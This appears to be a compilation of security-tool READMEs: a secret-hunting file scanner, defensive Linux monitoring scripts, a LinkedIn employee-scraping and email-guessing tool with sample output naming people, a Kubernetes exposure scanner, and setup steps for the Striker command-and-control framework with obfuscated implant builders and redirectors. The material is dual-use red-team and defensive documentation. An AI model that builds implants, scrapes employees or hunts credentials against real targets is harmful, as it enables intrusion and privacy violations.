-g GOLD, --gold GOLD JSON file containing the gold to search for
-d DIRECTORY, --directory DIRECTORY
Directory to search for gold
-r RECURSIVE, --recursive RECURSIVE
Search directory recursively?
-l LOG, --log LOG Log file to save output

Example Usage

Gold Digger will recursively go through all folders and files in search of content matching items listed in the gold.json file. Additionally, you can leverage an exclusion file called exclusions.json for skipping files matching specific extensions. Provide the root folder as the --directory flag.
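
For illustration, here is a minimal Python sketch of the same idea (not Gold Digger's own code); the patterns and excluded extensions below are made-up examples:

import os
import re

gold_patterns = [re.compile(r'password\s*='), re.compile(r'AKIA[0-9A-Z]{16}')]
excluded_extensions = {'.png', '.jpg', '.zip'}
root_dir = os.path.expanduser('~/Engagements/CustomerName/data/')

for root, _dirs, files in os.walk(root_dir):
    for name in files:
        if os.path.splitext(name)[1].lower() in excluded_extensions:
            continue
        path = os.path.join(root, name)
        try:
            with open(path, errors='ignore') as handle:
                for lineno, line in enumerate(handle, 1):
                    if any(p.search(line) for p in gold_patterns):
                        print(f'{path}:{lineno}: {line.strip()}')
        except OSError:
            continue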

An example structure could be:

~/Engagements/CustomerName/data/randomfiles/
~/Engagements/CustomerName/data/randomfiles2/
~/Engagements/CustomerName/data/code/

You would provide the following command to parse all 3 account reports:

python dig.py --gold gold.json --exclude exclusions.json --directory ~/Engagements/CustomerName/data/ --log Customer_2022-123_gold.log

Results

The tool will create a log file containing the scanning results. Due to the nature of using regular expressions, there may be numerous false positives. Despite this, the tool has been proven to increase productivity when processing thousands of files.

Shout-outs

Shout out to @d1vious for releasing git-wild-hunt https://github.com/d1vious/git-wild-hunt! Most of the regex in GoldDigger was used from this amazing project.



LSMS - Linux Security And Monitoring Scripts

By: Zion3R

These are a collection of security and monitoring scripts you can use to monitor your Linux installation for security-related events or for an investigation. Each script works on its own and is independent of other scripts. The scripts can be set up to either print out their results, send them to you via mail, or use AlertR as a notification channel.


Repository Structure

The scripts are located in the directory scripts/. Each script contains a short summary in the header of the file with a description of what it is supposed to do, (if needed) dependencies that have to be installed and (if available) references to where the idea for this script stems from.

Each script has a configuration file in the scripts/config/ directory to configure it. If the configuration file was not found during the execution of the script, the script will fall back to default settings and print out the results. Hence, it is not necessary to provide a configuration file.

The scripts/lib/ directory contains code that is shared between different scripts.

Scripts using a monitor_ prefix hold a state and are only useful for monitoring purposes. A single usage of them for an investigation will only show the current state of the Linux system and not changes that might be relevant for the system's security. If you want to establish the current state of your system as benign for these scripts, you can provide the --init argument.

Usage

Take a look at the header of the script you want to execute. It contains a short description what this script is supposed to do and what requirements are needed (if any needed at all). If requirements are needed, install them before running the script.

The shared configuration file scripts/config/config.py contains settings that are used by all scripts. Furthermore, each script can be configured by using the corresponding configuration file in the scripts/config/ directory. If no configuration file was found, a default setting is used and the results are printed out.

Finally, you can run all configured scripts by executing start_search.py (which is located in the main directory) or by executing each script manually. A Python3 interpreter is needed to run the scripts.

Monitoring

If you want to use the scripts to monitor your Linux system constantly, you have to perform the following steps:

  1. Set up a notification channel that is supported by the scripts (currently printing out, mail, or AlertR).

  2. Configure the scripts that you want to run using the configuration files in the scripts/config/ directory.

  3. Execute start_search.py with the --init argument to initialize the scripts with the monitor_ prefix and let them establish a state of your system. However, this assumes that your system is currently uncompromised. If you are unsure of this, you should verify its current state.

  4. Set up a cron job as root user that executes start_search.py (e.g., 0 * * * * root /opt/LSMS/start_search.py to start the search hourly).

List of Scripts

Name Script
Monitoring cron files monitor_cron.py
Monitoring /etc/hosts file monitor_hosts_file.py
Monitoring /etc/ld.so.preload file monitor_ld_preload.py
Monitoring /etc/passwd file monitor_passwd.py
Monitoring modules monitor_modules.py
Monitoring SSH authorized_keys files monitor_ssh_authorized_keys.py
Monitoring systemd unit files monitor_systemd_units.py
Search executables in /dev/shm search_dev_shm.py
Search fileless programs (memfd_create) search_memfd_create.py
Search hidden ELF files search_hidden_exe.py
Search immutable files search_immutable_files.py
Search kernel thread impersonations search_non_kthreads.py
Search processes that were started by a now disconnected SSH session search_ssh_leftover_processes.py
Search running deleted programs search_deleted_exe.py
Test script to check if alerting works test_alert.py
Verify integrity of installed .deb packages verify_deb_packages.py


LinkedInDumper - Tool To Dump Company Employees From LinkedIn API

By: Zion3R

Python 3 script to dump company employees from the LinkedIn API

Description

LinkedInDumper is a Python 3 script that dumps employee data from the LinkedIn social networking platform.

The results contain firstname, lastname, position (title), location and a user's profile link. Only 2 API calls are required to retrieve all employees if the company does not have more than 10 employees. Otherwise, we have to paginate through the API results. With the --email-format CLI flag one can define a Python string format to auto generate email addresses based on the retrieved first and last name.
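
The format string receives the first name as {0} and the last name as {1}; a quick Python sketch with example names only:

first, last = 'john', 'doe'
print('{0}.{1}@example.com'.format(first, last))      # john.doe@example.com
print('{0[0]}.{1}@example.com'.format(first, last))   # j.doe@example.com
print('{1}@example.com'.format(first, last))          # doe@example.com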


Requirements

LinkedInDumper talks with the unofficial LinkedIn Voyager API, which requires authentication. Therefore, you must have a valid LinkedIn user account. To keep it simple, LinkedInDumper just expects a cookie value provided by you. Doing it this way, even 2FA protected accounts are supported. Furthermore, you are tasked to provide a LinkedIn company URL to dump employees from.

Retrieving LinkedIn Cookie

  1. Sign into www.linkedin.com and retrieve your li_at session cookie value e.g. via developer tools
  2. Specify the cookie value either persistently in the python script's variable li_at or temporarily during runtime via the CLI flag --cookie

Retrieving LinkedIn Company URL

  1. Search your target company on Google Search or directly on LinkedIn
  2. The LinkedIn company URL should look something like this: https://www.linkedin.com/company/apple

Usage

usage: linkedindumper.py [-h] --url <linkedin-url> [--cookie <cookie>] [--quiet] [--include-private-profiles] [--email-format EMAIL_FORMAT]

options:
-h, --help show this help message and exit
--url <linkedin-url> A LinkedIn company url - https://www.linkedin.com/company/<company>
--cookie <cookie> LinkedIn 'li_at' session cookie
--quiet Show employee results only
--include-private-profiles
Show private accounts too
--email-format Python string format for emails; for example:
[1] john.doe@example.com > '{0}.{1}@example.com'
[2] j.doe@example.com > '{0[0]}.{1}@example.com'
[3] jdoe@example.com > '{0[0]}{1}@example.com'
[4] doe@example.com > '{1}@example.com'
[5] john@example.com > '{0}@example.com'
[6] jd@example.com > '{0[0]}{1[0]}@example.com'

Example 1 - Docker Run

docker run --rm l4rm4nd/linkedindumper:latest --url 'https://www.linkedin.com/company/apple' --cookie <cookie> --email-format '{0}.{1}@apple.de'

Example 2 - Native Python

# install dependencies
pip install -r requirements.txt

python3 linkedindumper.py --url 'https://www.linkedin.com/company/apple' --cookie <cookie> --email-format '{0}.{1}@apple.de'

Outputs

The script will return employee data as semi-colon separated values (like CSV):

[LinkedInDumper ASCII art banner] by LRVT

[i] Company Name: apple
[i] Company X-ID: 162479
[i] LN Employees: 1000 employees found
[i] Dumping Date: 17/10/2022 13:55:06
[i] Email Format: {0}.{1}@apple.de
Firstname;Lastname;Email;Position;Gender;Location;Profile
Katrin;Honauer;katrin.honauer@apple.com;Software Engineer at Apple;N/A;Heidelberg;https://www.linkedin.com/in/katrin-honauer
Raymond;Chen;raymond.chen@apple.com;Recruiting at Apple;N/A;Austin, Texas Metropolitan Area;https://www.linkedin.com/in/raytherecruiter

[i] Successfully crawled 2 unique apple employee(s). Hurray ^_-

Limitations

LinkedIn will allow only the first 1,000 search results to be returned when harvesting contact information. You may also need a LinkedIn premium account when you reached the maximum allowed queries for visiting profiles with your freemium LinkedIn account.

Furthermore, not all employee profiles are public. The results vary depending on your used LinkedIn account and whether you are befriended with some employees of the company to crawl or not. Therefore, it is sometimes not possible to retrieve the firstname, lastname and profile url of some employee accounts. The script will not display such profiles, as they contain default values such as "LinkedIn" as firstname and "Member" in the lastname. If you want to include such private profiles, please use the CLI flag --include-private-profiles. Although some accounts may be private, we can obtain the position (title) as well as the location of such accounts. Only firstname, lastname and profile URL are hidden for private LinkedIn accounts.

Finally, LinkedIn users are free to name their profiles however they like. An account name can therefore contain all sorts of things such as salutations, abbreviations, emojis, middle names etc. I tried my best to strip out some of this noise, but it is not a complete solution to the general problem. Note that the script does not use the official LinkedIn API; it gathers information from the "unofficial" Voyager API.
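A rough sketch of that kind of best-effort name cleanup (the patterns below are assumptions for illustration, not the exact rules used by the script):

import re

SALUTATIONS = re.compile(r"^(dr|prof|mr|mrs|ms)\.?\s+", re.IGNORECASE)
NON_NAME = re.compile(r"[^A-Za-z'\- ]")  # strip emojis, digits and symbols (extend for accented letters)

def clean_name(raw):
    name = SALUTATIONS.sub("", raw.strip())
    name = NON_NAME.sub("", name)
    return " ".join(name.split())  # collapse leftover whitespace

print(clean_name("Dr. Katrin Honauer "))  # -> "Katrin Honauer"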



KubeStalk - Discovers Kubernetes And Related Infrastructure Based Attack Surface From A Black-Box Perspective



KubeStalk is a tool to discover Kubernetes and related infrastructure based attack surface from a black-box perspective. This tool is a community version of the tool used to probe for unsecured Kubernetes clusters around the internet during Project Resonance - Wave 9.


Usage

The GIF below demonstrates usage of the tool:


Installation

KubeStalk is written in Python and requires the requests library.

To install the tool, you can clone the repository to any directory:

git clone https://github.com/redhuntlabs/kubestalk

Once cloned, you need to install the requests library using python3 -m pip install requests or:

python3 -m pip install -r requirements.txt

Everything is now set up and you can use the tool directly.

Command-line Arguments

A list of command line arguments supported by the tool can be displayed using the -h flag.

$ python3 kubestalk.py  -h

+---------------------+
| K U B E S T A L K |
+---------------------+ v0.1

[!] KubeStalk by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
[!] Author: 0xInfection (RHL Research Team)
[!] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr.

usage: ./kubestalk.py <url(s)>/<cidr>

Required Arguments:
urls List of hosts to scan

Optional Arguments:
-o OUTPUT, --output OUTPUT
Output path to write the CSV file to
-f SIG_FILE, --sig-dir SIG_FILE
Signature directory path to load
-t TIMEOUT, --timeout TIMEOUT
HTTP timeout value in seconds
-ua USER_AGENT, --user-agent USER_AGENT
User agent header to set in HTTP requests
--concurrency CONCURRENCY
No. of hosts to process simultaneously
--verify-ssl Verify SSL certificates
--version Display the version of KubeStalk and exit.

Basic Usage

To use the tool, you can pass one or more hosts to the script. All targets passed to the tool must be RFC 3986 compliant, i.e. they must contain a scheme and a hostname (and a port if required).
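A quick way to check that a target meets this requirement is to parse it and require both a scheme and a hostname; a generic sketch (not KubeStalk's internal validation):

from urllib.parse import urlparse

def is_valid_target(url):
    # RFC 3986 style target: scheme + hostname (+ optional port)
    parsed = urlparse(url)
    return parsed.scheme in ("http", "https") and bool(parsed.hostname)

print(is_valid_target("https://10.0.0.1:10250"))  # True
print(is_valid_target("10.0.0.1:10250"))          # False - scheme is missing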

A basic usage is as below:

$ python3 kubestalk.py https://███.██.██.███:10250

+---------------------+
| K U B E S T A L K |
+---------------------+ v0.1

[!] KubeStalk by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
[!] Author: 0xInfection (RHL Research Team)
[!] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr.

[+] Loaded 10 signatures to scan.
[*] Processing host: https://███.██.██.██:10250
[!] Found potential issue on https://███.██.██.██:10250: Kubernetes Pod List Exposure
[*] Writing results to output file.
[+] Done.

HTTP Tuning

HTTP requests can be fine-tuned using the -t (to set the HTTP timeout), -ua (to specify a custom user agent) and --verify-ssl (to validate SSL certificates while making requests) flags.
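Conceptually, these flags map onto the underlying requests call roughly as follows (an illustrative sketch, not the tool's actual code):

import requests

def probe(url, timeout=10, user_agent="kubestalk", verify_ssl=False):
    # -t / --timeout, -ua / --user-agent and --verify-ssl in one place
    return requests.get(
        url,
        timeout=timeout,
        headers={"User-Agent": user_agent},
        verify=verify_ssl,
    )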

Concurrency

You can control the number of hosts to scan simultaneously using the --concurrency flag. The default value is set to 5.
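Internally, this kind of option usually translates into a bounded worker pool; a minimal sketch of the idea (not the tool's actual implementation):

from concurrent.futures import ThreadPoolExecutor

def scan_host(host):
    # placeholder for the per-host probing logic
    return host, "scanned"

def scan_all(hosts, concurrency=5):
    # --concurrency bounds how many hosts are processed at the same time
    with ThreadPoolExecutor(max_workers=concurrency) as pool:
        return list(pool.map(scan_host, hosts))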

Output

The output is written to a CSV file, and the destination can be controlled with the --output flag.
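Writing such findings to CSV is straightforward; a small sketch using the column names from the sample table below (assumed from that sample, not taken from the tool's source):

import csv

def write_results(path, findings):
    # findings: iterable of (host, path, issue, type, severity) tuples
    with open(path, "w", newline="") as fh:
        writer = csv.writer(fh)
        writer.writerow(["host", "path", "issue", "type", "severity"])
        writer.writerows(findings)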

A sample of the CSV output rendered in markdown is as below:

| host | path | issue | type | severity |
|------|------|-------|------|----------|
| https://█.█.█.█:10250 | /pods | Kubernetes Pod List Exposure | core-component | vulnerability/misconfiguration |
| https://█.█.█.█:443 | /api/v1/pods | Kubernetes Pod List Exposure | core-component | vulnerability/misconfiguration |
| http://█.█.██.█:80 | / | etcd Viewer Dashboard Exposure | add-on | vulnerability/exposure |
| http://██.██.█.█:80 | / | cAdvisor Metrics Web UI Dashboard Exposure | add-on | vulnerability/exposure |

Version & License

The tool is licensed under the BSD 3 Clause License and is currently at v0.1.

To know more about our Attack Surface Management platform, check out NVADR.



Striker - A Command And Control (C2)


Striker is a simple Command and Control (C2) program.


Disclaimer

This project is under active development. Most of the features are experimental, with more to come. Expect breaking changes.

Features

A) Agents

  • Native agents for linux and windows hosts.
  • Self-contained, minimal python agent should you ever need it.
  • HTTP(s) channels.
  • Asynchronous task execution.
  • Support for multiple redirectors, with fallback to another one when the active redirector goes down.

B) Backend / Teamserver

  • Supports multiple operators.
  • Most features exposed through the REST API, making it easy to automate things.
  • Uses web sockets for faster comms.

C) User Interface

  • Smooth and reactive UI thanks to Svelte and SocketIO.
  • Easy to configure as it compiles into static HTML, JavaScript, and CSS files, which can be hosted with even the most basic web server you can find.
  • Teamchat feature to communicate with other operators over text.

Installing Striker

Clone the repo;

$ git clone https://github.com/4g3nt47/Striker.git
$ cd Striker

The codebase is divided into 4 independent sections;

1. The C2 Server / Backend

This handles all server-side logic for both operators and agents. It is a NodeJS application made with;

  • express - For the REST API.
  • socket.io - For Web Socket communication.
  • mongoose - For connecting to MongoDB.
  • multer - For handling file uploads.
  • bcrypt - For hashing user passwords.

The source code is in the backend/ directory. To set up the server;

  1. Set up a MongoDB database;

Striker uses MongoDB as its backend database to store all important data. You can install it locally on your machine (for Debian-based distros, see MongoDB's official installation guide), or create a free hosted instance with MongoDB Atlas (a database-as-a-service platform).

  2. Move into the source directory;
$ cd backend
  3. Install dependencies;
$ npm install
  4. Create a directory for static files;
$ mkdir static

You can use this folder to host static files on the server. This should also be the directory your UPLOAD_LOCATION in the .env file points to (more on this later), though that is not strictly required. Files in this directory will be publicly accessible under the path /static/.

  5. Create a .env file;

NOTE: Values between < and > are placeholders. Replace them with appropriate values (including the <>). For fields that require random strings, you can generate them easily using;

$ head -c 100 /dev/urandom | sha256sum
DB_URL=<your MongoDB connection URL>
HOST=<host to listen on (default: 127.0.0.1)>
PORT=<port to listen on (default: 3000)>
SECRET=<random string to use for signing session cookies and encrypting session data>
ORIGIN_URL=<full URL of the server you will be hosting the frontend at. Used to setup CORS>
REGISTRATION_KEY=<random string to use for authentication during signup>
MAX_UPLOAD_SIZE=<max file upload size, in bytes>
UPLOAD_LOCATION=<directory to store uploaded files to (default: static)>
SSL_KEY=<your SSL key file (optional)>
SSL_CERT=<your SSL cert file (optional)>

Note that SSL_KEY and SSL_CERT are optional. If either is not defined, a plain HTTP server will be created instead. This helps avoid needless overhead when running the server behind an SSL-enabled reverse proxy on the same host.

  6. Start the server;
$ node index.js
[12:45:30 PM] Connecting to backend database...
[12:45:31 PM] Starting HTTP server...
[12:45:31 PM] Server started on port: 3000

2. The Frontend

This is the web UI used by operators. It is a single page web application written in Svelte, and the source code is in the frontend/ directory.

To set up the frontend;

  1. Move into the source directory;
$ cd frontend
  2. Install dependencies;
$ npm install
  3. Create a .env file with the variable VITE_STRIKER_API set to the full URL of the C2 server as configured above;
VITE_STRIKER_API=https://c2.striker.local
  4. Build;
$ npm run build

The above will compile everything into a static web application in the dist/ directory. You can move all the files inside it into the web root of your web server, or host them with a basic HTTP server such as Python's;

$ cd dist
$ python3 -m http.server 8000
  5. Sign up;
  • Open the site in a web browser. You should see a login page.
  • Click on the Register button.
  • Enter a username, password, and the registration key in use (see REGISTRATION_KEY in backend/.env)

This will create a standard user account. You will need an admin account to access some features. Your first admin account must be created manually; afterwards, you can upgrade and downgrade other accounts in the Users tab of the web UI.

To create your first admin account;

  • Connect to the MongoDB database used by the backend.
  • Update the users collection and set the admin field of the target user to true;

There are different ways you can do this. If you have mongo available in your CLI, you can do it using;

$ mongo <your MongoDB connection URL>
> db.users.updateOne({username: "<your username>"}, {$set: {admin: true}})

You should get the following response if it works;

{ "acknowledged" : true, "matchedCount" : 1, "modifiedCount" : 1 }

You can now login :)

3. The C2 Redirector

A) Dumb Pipe Redirection

A dumb pipe redirector written for Striker is available at redirector/redirector.py. Obviously, this will only work for plain HTTP traffic, or for HTTPS when SSL verification is disabled (you can do this by enabling the INSECURE_SSL macro in the C agent).
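The idea behind a dumb pipe is simply to shuttle bytes between the agent and the C2 without inspecting them. A minimal illustrative sketch of that pattern (not the bundled redirector.py):

import socket, threading

def pipe(src, dst):
    # copy bytes one way until either side closes
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        src.close()
        dst.close()

def redirect(listen_addr, target_addr):
    server = socket.socket()
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind(listen_addr)
    server.listen(5)
    while True:
        client, _ = server.accept()
        upstream = socket.create_connection(target_addr)
        threading.Thread(target=pipe, args=(client, upstream), daemon=True).start()
        threading.Thread(target=pipe, args=(upstream, client), daemon=True).start()

# redirect(("0.0.0.0", 443), ("c2.example.org", 443))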

The following example listens on port 443 on all interfaces and forwards to c2.example.org on port 443;

$ cd redirector
$ ./redirector.py 0.0.0.0:443 c2.example.org:443
[*] Starting redirector on 0.0.0.0:443...
[+] Listening for connections...

B) Nginx Reverse Proxy as Redirector

  1. Install Nginx;
$ sudo apt install nginx
  2. Create a vhost config (e.g. /etc/nginx/sites-available/striker);

Placeholders;

  • <domain-name> - This is your server's FQDN, and should match the one in your SSL cert.
  • <ssl-cert> - The SSL cert file to use.
  • <ssl-key> - The SSL key file to use.
  • <c2-server> - The full URL of the C2 server to forward requests to.

WARNING: client_max_body_size should be at least as large as the size defined by MAX_UPLOAD_SIZE in your backend/.env file, or uploads of large files will fail.

server {
listen 443 ssl;
server_name <domain-name>;
ssl_certificate <ssl-cert>;
ssl_certificate_key <ssl-key>;
client_max_body_size 100M;
access_log /var/log/nginx/striker.log;

location / {
proxy_pass <c2-server>;
proxy_redirect off;
proxy_ssl_verify off;
proxy_read_timeout 90;
proxy_http_version 1.0;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}
}
  3. Enable it;
$ sudo ln -s /etc/nginx/sites-available/striker /etc/nginx/sites-enabled/striker
  4. Restart Nginx;
$ sudo service nginx restart

Your redirector should now be up and running on port 443, and can be tested using (assuming your FQDN is striker.local);

$ curl https://striker.local

If it works, you should get the 404 response used by the backend, like;

{"error":"Invalid route!"}

4. The Agents (Implants)

A) The C Agent

These are the implants used by Striker. The primary agent is written in C, and is located in agent/C/. It supports both linux and windows hosts. The linux agent has an external dependency on libcurl, which you will find installed on most systems.

The windows agent does not have an external dependency. It uses wininet for comms, which I believe is available on all windows hosts.

  1. Building for linux

Assuming you're on a 64 bit host, the following will build a 64 bit agent;

$ cd agent/C
$ mkdir bin
$ make

To build for 32 bit on a 64 bit host;

$ sudo apt install gcc-multilib
$ make arch=32

The above compiles everything into the bin/ directory. You will need only two files to generate working implants;

  • bin/stub - This is the agent stub that will be used as template to generate working implants.
  • bin/builder - This is what you will use to patch the agent stub to generate working implants.

The builder accepts the following arguments;

$ ./bin/builder 
[-] Usage: ./bin/builder <url> <auth_key> <delay> <stub> <outfile>

Where;

  • <url> - The server to report to. This should ideally be a redirector, but a direct URL to the server will also work.
  • <auth_key> - The authentication key to use when connecting to the C2. You can create this in the auth keys tab of the web UI.
  • <delay> - Delay between each callback, in seconds. This should be at least 2, depending on how noisy you want it to be.
  • <stub> - The stub file to read, bin/stub in this case.
  • <outfile> - The output filename of the new implant.

Example;

$ ./bin/builder https://localhost:3000 979a9d5ace15653f8ffa9704611612fc 5 bin/stub bin/striker
[*] Obfuscating strings...
[+] 69 strings obfuscated :)
[*] Finding offsets of our markers...
[+] Offsets:
URL: 0x0000a2e0
OBFS Key: 0x0000a280
Auth Key: 0x0000a2a0
Delay: 0x0000a260
[*] Patching...
[+] Operation completed!
  2. Building for windows

You will need MinGW for this. The following will install the 32 and 64 bit dev windows environment;

$ sudo apt install mingw-w64

Build for 64 bit;

$ cd agent/C
$ mkdir bin
$ make target=win

To compile for 32 bit;

$ make target=win arch=32

This will compile everything into the bin/ directory, and you will have the stub and the builder as bin\stub.exe and bin\builder.exe, respectively.

B) The Python Agent

Striker also comes with a self-contained python agent (tested on python 2.7.16 and 3.7.3). This is located at agent/python/. Only the most basic features are implemented in this agent. Useful for hosts that can't run the C agent but have python installed.

There are 2 files in this directory;

  • stub.py - This is the payload stub to pass to the builder.
  • builder.py - This is what you'll be using to generate an implant.
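Conceptually, the builder just loads the stub and substitutes the connection settings into it before writing the final implant. A hedged sketch of that idea (the placeholder markers below are invented for illustration and do not reflect the real stub format):

def build_implant(stub_path, outfile, url, auth_key, delay):
    # illustrative only: read the stub, fill in the config, write the implant
    with open(stub_path) as fh:
        stub = fh.read()
    payload = (stub.replace("{{URL}}", url)
                   .replace("{{AUTH_KEY}}", auth_key)
                   .replace("{{DELAY}}", str(delay)))
    with open(outfile, "w") as fh:
        fh.write(payload)

# build_implant("stub.py", "output.py", "http://localhost:3000", "<auth_key>", 2)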

Usage example:

$ ./builder.py
[-] Usage: builder.py <url> <auth_key> <delay> <stub> <outfile>
# The following will generate a working payload as `output.py`
$ ./builder.py http://localhost:3000 979a9d5ace15653f8ffa9704611612fc 2 stub.py output.py
[*] Loading agent stub...
[*] Writing configs...
[+] Agent built successfully: output.py
# Run it
$ python3 output.py

Getting Started

After following the above instructions, Striker should now be ready for use. Kindly go through the usage guide. Have fun, and happy hacking!

Support

If you like the project, consider helping me turn coffee into code!



โŒ